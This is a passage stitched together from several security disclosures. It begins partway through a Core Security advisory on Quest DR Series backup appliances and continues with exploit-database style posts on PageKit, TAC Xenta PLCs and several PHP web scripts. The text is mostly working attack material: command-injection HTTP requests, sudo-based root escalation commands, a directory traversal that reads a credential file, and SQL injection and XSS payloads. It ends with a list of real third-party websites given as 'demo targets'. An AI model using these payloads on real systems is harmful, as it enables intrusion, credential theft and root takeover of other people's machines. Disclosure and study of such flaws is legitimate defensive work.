Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 106
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “delete”,
“params”: {
“classname”: “DRReplications”,
“name”: “‘; sleep 15; #”
},
“id”: 1
}
—–/

7.30. *Command injection in the set hostname method*

[CVE-2018-11172]
The system hostname can be updated via the ‘HostnameService’ exposed
functionality. Request parameters are not sanitized.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 104
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “set”,
“params”: {
“classname”: “DRHostname”,
“hostname”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.31. *Command injection in the add email alert method*

[CVE-2018-11173]
Attackers can inject system commands by requesting to add an email alert and
providing a malicious email address containing the payload.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 112
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “add”,
“params”: {
“classname”: “DREmailAlerts”,
“emailAddress”: “‘; sleep 10; #”
},
“id”: 1
}
—–/

7.32. *Command injection in the delete email alert method*

[CVE-2018-11174]
Analogous to the email alert ‘add’ subroutine, the ‘delete’ email alert
counterpart is also vulnerable to command injection because of an
unsanitized
email address parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 115
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “delete”,
“params”: {
“classname”: “DREmailAlerts”,
“emailAddress”: “‘; sleep 10; #”
},
“id”: 1
}
—–/

7.33. *Command injection in the setBandwidthLimit method*

[CVE-2018-11175]
The DR series appliance can be configured to enforce different limits over
the network traffic. This functionality is handled by the
‘NetworkInterfacesServices’ module and its ‘setBandwidthLimit’ subroutine
was found to be vulnerable to command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 154
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “setBandwidthLimit”,
“params”: {
“classname”: “DRNetworkInterface”,
“bandwidthUnit”: “default”,
“targetIp”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.34. *Command injection in the set_passphrase method*

[CVE-2018-11176]
A DR series system can be configured to use encryption at rest. The method
that sets the passphrase can be abused by attackers to execute arbitrary
system commands.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 119
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “set_passphrase”,
“params”: {
“classname”: “DREncryption”,
“passphrase”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.35. *Command injection in the set_encryption_settings method*

[CVE-2018-11177]
Different encryption settings can be configured, such as the encryption mode
and the key rotation interval. These parameters are taken from the user
generated request and used as components of a command string, therefore
allowing attackers to inject arbitrary system commands.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 128
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “set_encryption_settings”,
“params”: {
“classname”: “DREncryption”,
“encryption”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.36. *Command injection in the start_filesystem method*

[CVE-2018-11178]
Several features implemented in the ‘StartupPassphraseService’ module were
found to be vulnerable to command injection. In particular, the
‘start_filesystem’
subroutine takes a user supplied passphrase to construct a system command.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 129
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “start_filesystem”,
“params”: {
“classname”: “DRStartupPassphrase”,
“passphrase”: “‘; sleep 10; #”
},
“id”: 1
}
—–/

7.37. *Command injection in the save_configuration method*

[CVE-2018-11179]
Saving startup configuration was also found to be prone to command injection
issues.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 151
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “save_configuration”,
“params”: {
“classname”: “DRStartupPassphrase”,
“status”: “pepito”,
“passphrase”: “‘; sleep 10; #”
},
“id”: 1
}
—–/

7.38. *Command injection in the cloud portal register method*

[CVE-2018-11180]
The ‘CloudPortal’ module allows to register an agent with the cloud portal
system. Its ‘register’ subroutine was found to be vulnerable to command
injection via the ‘registrationCode’ request parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 120
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “register”,
“params”: {
“classname”: “DRCloudPortal”,
“registrationCode”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.39. *Command injection in the customer portal register method*

[CVE-2018-11181]
The subroutine in charge of registering the DR series appliance with the
Quest Customer Portal could be abused by an authenticated attacker to
execute system commands via a specially crafted ‘token’ request parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 112
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “register”,
“params”: {
“classname”: “DRCustomerPortal”,
“token”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.40. *Command injection in the customer portal changeManageBtn method*

[CVE-2018-11182]
Customer portal integration supports changing the manage button action.
This functionality was found to be vulnerable via the ‘action’ parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 120
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “changeManageBtn”,
“params”: {
“classname”: “DRCustomerPortal”,
“action”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.41. *Command injection in the set DNS method*

[CVE-2018-11183]
The ‘set’ subroutine in the ‘DnsService’ module allows users to configure
the DNS servers used. When setting new DNS server configuration, several
user supplied parameters are used to build a command line string without
applying any sanitization, therefore leading to command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 101
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “set”,
“params”: {
“classname”: “DRDns”,
“dns_suffix”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.42. *Command injection in the get usage method*

[CVE-2018-11184]
The ‘UsageService’ module allows administrators to monitor system usage.
A single subroutine processes the user’s query and returns the corresponding
statistics.

The following proof of concept exploits the ‘usage’ type.

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 114
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “get”,
“params”: {
“classname”: “DRUsage”,
“type”: “usage”,
“width”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.43. *Command injection in the support portal register method*

[CVE-2018-11185]
DR series systems can be registered with the Quest Support Portal.
Registered
systems collect certain information such as operational statistics,
performance
metrics, diagnostic information and configuration settings, which are then
transmitted to Quest in order to help troubleshoot system problems.

The subroutine implementing the registration functionality with the Support
Portal was found to be vulnerable to command injection via the ’email’
parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 111
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “register”,
“params”: {
“classname”: “DRSupportPortal”,
“email”: “; sleep 10; #”
},
“id”: 1
}
—–/

7.44. *Command injection in the setDateAndTime method*

[CVE-2018-11186]
Attackers can execute arbitrary system commands by configuring a custom
timezone.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 115
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “setDateAndTime”,
“params”: {
“classname”: “DRDateTime”,
“timezone”: “; sleep 10; #”
},
“id”: 1
}

—–/

7.45. *Command injection in the global view add_member method*

[CVE-2018-11187]
GlobalView is a dashboard view providing a global picture of all the DR
Series systems in an organization. The functionality to add a new system
was found to be vulnerable to command injection via the ‘RemoteHost’
parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 165
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “add_member”,
“params”: {
“classname”: “DRGlobalView”,
“UserName”: “pepito”,
“Password”: “pepito123”,
“RemoteHost”: “; sleep 10; echo “
},
“id”: 1
}
—–/

7.46. *Command injection in the global view reconnect_member method*

[CVE-2018-11188]
Reconnecting a disconnected system in the Global View page can also result
in arbitrary command execution.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 171
Connection: close

{
“jsonrpc”: “2.0”,
“method”: “reconnect_member”,
“params”: {
“classname”: “DRGlobalView”,
“UserName”: “pepito”,
“Password”: “pepito123”,
“RemoteHost”: “; sleep 10; echo “
},
“id”: 1
}
—–/

7.47. *Privilege escalation from web server user to root via perl*

[CVE-2018-11189]
The web server is running as the webadmin user. Exploiting any of the
command injection vulnerabilities oulined in the previous sections would
then result in ‘webadmin’ level access.

The webadmin user has sudo access to run the perl interpreter as root,
presumably to operate the various scripts that are called from the web
application. However, this means that an attacker who manages to execute
code in the context of the web server can easily escalate user privileges
to root by running arbitrary code via the perl interpreter.

/—–
sh-3.2$ id
uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)
sh-3.2$ sudo perl -e ‘system(“/bin/bash”)’

id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

—–/

7.48. *Privilege escalation from web server user to root via env*

[CVE-2018-11190]
The webadmin user has sudo access to run the /bin/env binary with root
permissions, resulting in direct privilege escalation.

/—–
[email protected] > sudo env -i /bin/sh
sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
—–/

7.49. *Privilege escalation from web server user to root via local scripts*

[CVE-2018-11191]
The webadmin user is allowed to run local configuration scripts located in
/usr/local/bin with root level permissions and without requiring a password.
In particular, there is an ‘exec.sh’ shell script that allows users to
execute
arbitrary commands. Because it can be run via sudo, this results once again
in privilege escalation to root.

/—–
[email protected] > id
uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)
[email protected] > sudo /usr/local/bin/exec.sh /bin/bash

NOTICE: To capture ‘service’ session output please use ‘capture’ command.
Type ‘exit’ to stop the capture.

Total alert messages : 0

[email protected] > id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
—–/

7.50. *Privilege escalation from web server user to root via strace*

[CVE-2018-11192]
The strace binary can be run by the webadmin user with root privileges.
In reality, this means that arbitrary processes are run as root, opening
another vector to escalate privileges once the web server is compromised.

/—–
[email protected] > id
uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)
[email protected] > sudo strace /usr/bin/id
[…]
read(3, “root:x:0:root,admin,administrato”…, 4096) = 731
close(3) = 0
munmap(0x2ba34633d000, 4096) = 0
write(1, “uid=0(root) gid=0(root) groups=0″…, 88uid=0(root)
gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
) = 88
close(1) = 0
munmap(0x2ba34633c000, 4096) = 0
exit_group(0) = ?
—–/

7.51. *Privilege escalation from web server user to root via ocashell*

[CVE-2018-11193]
The ocashell script located in the /usr/local/bin directory spawns a bash
shell and can be executed by the webadmin user via sudo. This results in a
command line shell with root privileges.

/—–
[email protected] > sudo /usr/local/bin/ocashell

NOTICE: To capture ‘service’ session output please use ‘capture’ command.
Type ‘exit’ to stop the capture.

Total alert messages : 0

[email protected] > id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
—–/

7.52. *Privilege escalation from web server user to root via setsid*

[CVE-2018-11194]
Another command that can be run via sudo once code execution as the webadmin
user is achieved is the /usr/bin/setsid binary. This binary is used to run a
program in a new session, resulting in local privilege escalation to root.

/—–
[email protected] > sudo /usr/bin/setsid id > /tmp/pepito
[email protected] > cat /tmp/pepito
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
—–/

8. *Report Timeline*
2018-01-31: Core Security sent an initial notification to Quest Software
Inc.
(Quest), asking for GPG keys in order to send draft advisory.
2018-01-31: Quest Support answered asking for the advisory in clear text.
2018-01-31: Core Security sent the draft advisory in clear text form.
2018-01-31: Quest Support replied that they received the draft advisory
and that they would review it.
2018-02-07: Core Security requested an update from Quest regarding the
reported vulnerabilities and a tentative schedule.
2018-02-07: Quest Support answered that it opened a bug id to track the
fixes and asked Core Security for a tentative publication date.
2018-02-07: Core Security answered saying that its intention is to
coordinate
the release in conjunction adjusting the schedule to the Quest’s
development
timeline.
2018-02-08: Quest Support replied that engineering is testing the fixes and
they should have an estimate timeline the week of 12 February.
2018-02-15: Core Security requested a status update.
2018-02-22: Core Security again requested a status update and an estimated
timescale.
2018-02-22: Quest Support answered that it is trying to get an update from
the engineering team.
2018-03-01: Core Security requested a status update and a solidified
timeline.
2018-03-01: Quest Support replied saying that engineering is planning to
have a patch ready by the end of March.
2018-03-01: Core Security thanked the follow up and replied saying that
it will contact Quest in two weeks.
2018-03-15: Core Security requested a status update.
2018-03-26: Core Security requested a status update again.
2018-03-26: Quest Support answered saying it will get an update from the
engineering team.
2018-04-10: Quest Support informed that the latest build 4.0.3.1 addresses
the vulnerabilities that were reported.
2018-04-10: Core Security asked if all the vulnerabilities reported are
addressed by this build.
2018-05-31: Advisory CORE-2018-0002 published.

9. *References*

[1] https://www.quest.com/products/dr-series-disk-backup-appliances/

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.

11. *About Core Security*

Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The company’s
threat-aware, identity & access, network security, and vulnerability
management solutions provide actionable insight and context needed to
manage security risks across the enterprise. This shared insight gives
customers a comprehensive view of their security posture to make better
security remediation decisions. Better insight allows organizations to
prioritize their efforts to protect critical assets, take action sooner
to mitigate access risk, and react faster if a breach does occur.

Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or [email protected]

12. *Disclaimer*

The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security advisories
team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

PageKit CMS 1.0.13 Cross Site Scripting

 CVE ID: CVE-2018-11564

Stored XSS in PageKit CMS 1.0.13 allows a user to upload malicious code via
the picture upload feature.
A user with elevated privileges could upload a photo to the system in an
SVG format. This file will be uploaded to the system and it will not be
stripped or filtered. The user can create a link on the website pointing to
"/storage/poc.svg" that will point to http://localhost/pagekit/
storage/poc.svg. When a user comes along to click that link, it will
trigger a XSS attack.

TAC Xenta 511 / 911 Credential Disclosure

# Exploit Title: TAC Xenta 511 and 911 Credentials Disclosure
# Date: 25.05.2018
# Exploit Author: Marek Cybul
# Vendor Homepage:
https://download.schneider-electric.com/files?p_File_Name=TAC_Xenta_911_SDS-XENTA911.pdf
# Version: 5.17

# Schneider Electric TAC Xenta 911 and 511 PLCs

Directory traversal in help manuals allows for credentials extraction

Devices are not indexed by crawlers like Shodan or Censys due to
ancient SSL configuration,
needed to use old browser to support it (not even s_client, curl or
ncat could connect).

Example URI: /www/help/public/../../../sys/pswd

vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv

HTTP/1.0 200 OK

root
super user
/
/
/
password
0
900
3

New STAR 2.1 Cross Site Scripting / SQL Injection

New STAR 2.1 Cross Site Scripting / SQL Injection
Posted May 31, 2018
Authored by Kagan Capar

New STAR version 2.1 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | a856c03164de7ba7c99d58887aa40da0
# Exploit Title: New STAR 2.1 - SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kagan Capar
# Contact: [email protected]
# Vendor Homepage: https://codecanyon.net/item/new-star-listen-youtube-music/7486113
# Version: 2.1
# Category: Webapps
# Tested on: Kali Linux
# Description : 'ajax.php' working in the input field contains SQL
vulnerability. The search section also contains XSS vulnerability.
====================================================

# PoC : SQLi :

Parameter: name (GET)

Type: AND/OR time-based blind
Demo:
http://site.com/requests/ajax.php?newstar=login&name=admin&password=123456
Title: MySQL >= 5.0.12 AND time-based blind
Payload: newstar=login&name=admin' AND SLEEP(5) AND
'ddni'='ddni&password=123456

====================================================

# PoC : XSS :

Payload(1) :
http://site.com/play?mouse_search=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&p=1

PHP Dashboards NEW 5.5 SQL Injection

# Exploit Title: PHP Dashboards NEW v5.5 – ‘Login’ SQL Injection
# Dork: N/A
# Date: 31.05.2018
# Exploit Author: Kagan Capar
# Contact: [email protected]
# Vendor Homepage: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104

# Version: 5.5
# Category: Webapps
# Tested on: Kali linux
# Description : PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.
====================================================

# PoC : SQLi :

POST /php/save/user.php?mode=lookup HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 52
Cookie: PHPSESSID=phcubu5ohtdjnd6g1bmsncro87
Connection: keep-alive
email=test%40test.com&password=test123&dashboardKey=

Parameter: email (POST)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: [email protected]’ AND SLEEP(5) AND
‘XnxG’=’XnxG&password=test123&dashboardKey=

====================================================

CSV Import And Export 1.1.0 Cross Site Scripting / SQL Injection

# Exploit Title: CSV Import & Export v1.1.0 – SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kagan Capar
# Contact: [email protected]
# Vendor Homepage: https://codecanyon.net/item/csv-import-export/21105509
# Version: 1.1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The ‘offset’ and ‘db’ parameters in the database table
preview query has vulnerabilities.
====================================================
# PoC : SQLi :

Parameter: offset (GET)
Type: UNION query
Demo:
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&[email protected]:3306&table=clients&order=asc&offset=30&limit=10
Title: Generic UNION query (NULL) – 10 columns
Payload: action=export_getInput&[email protected]:3306&table=clients&order=asc&offset=30
UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x7178707671,0x78564b6846794858636354787350514d467a4863704d7a50735068495a6f7a5552625046616d6273,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL–
STgb&limit=10

====================================================
# PoC : XSS :

Payload =
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&table=clients&order=asc&offset=30&limit=10

Grid Pro Big Data 1.0 SQL Injection

# Exploit Title: Grid Pro Big Data 1.0 – ‘test.php’ SQL Injection
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Vendor Homepage: https://codecanyon.net/item/grid-pro-big-data-table-view-data-grid-with-sort-search-and-filter-for-large-mysql-tables/20395348

# Version: 1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The multiple parameters in the ‘test.php’ query contain
SQLi vulnerabilities.
====================================================
# PoC : SQLi :

POST /release/pro_grid_big_data/php/test.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/release/pro_grid_big_data/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 430
Connection: keep-alive
page=1&on_home=5&table_name=be&params%5B0%5D%5Btype%5D=text&params%5B0%5D%5Bvalue%5D=&params%5B0%5D%5Bname%5D=Name&params%5B1%5D%5Btype%5D=text&params%5B1%5D%5Bvalue%5D=&params%5B1%5D%5Bname%5D=Surname&params%5B2%5D%5Btype%5D=num_range&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bname%5D=Age&params%5B3%5D%5Btype%5D=date&params%5B3%5D%5Bvalue%5D=&params%5B3%5D%5Bname%5D=Born_date&ordering=none

Parameter: on_home (POST)
Type: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: page=2&on_home=5 UNION ALL SELECT
CONCAT(CONCAT(‘qjbqq’,’vVWAgYsZnIsAkqERYDgZibFieBTaDlfAymtKvnaO’),’qxbpq’),NULL,NULL,NULL–
LEgG&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none

Parameter: params[0][value] (POST)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload:
page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=%’ AND
1906=1906 AND
‘%’=’&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload:
page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=%’ AND
SLEEP(5) AND
‘%’=’&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none

Parameter: params[0][name] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload:
page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name)
AND SLEEP(5) AND
(2977=2977&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none

====================================================

Chitasoft 3.6.2 SQL Injection

# Exploit Title: chitasoft Login Page SQL Injection Vulnerability
# Version : 3.6.2
# Exploit Author: Hesam Bazvand
# Software Link: http://sharetronix.ir/wp-content/uploads/2014/10/gold.zip
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
# Dork : O*O+-OSSOU O3OSSUOa : UUOaOSSO3OSSUOa
# Email : [email protected]

Exploit : Insert ' In Username field And Enjoy

Demo Targets : http://gilletteshop.ir/account.php
http://mehregan.co/account.php
http://www.onlineyadak.com/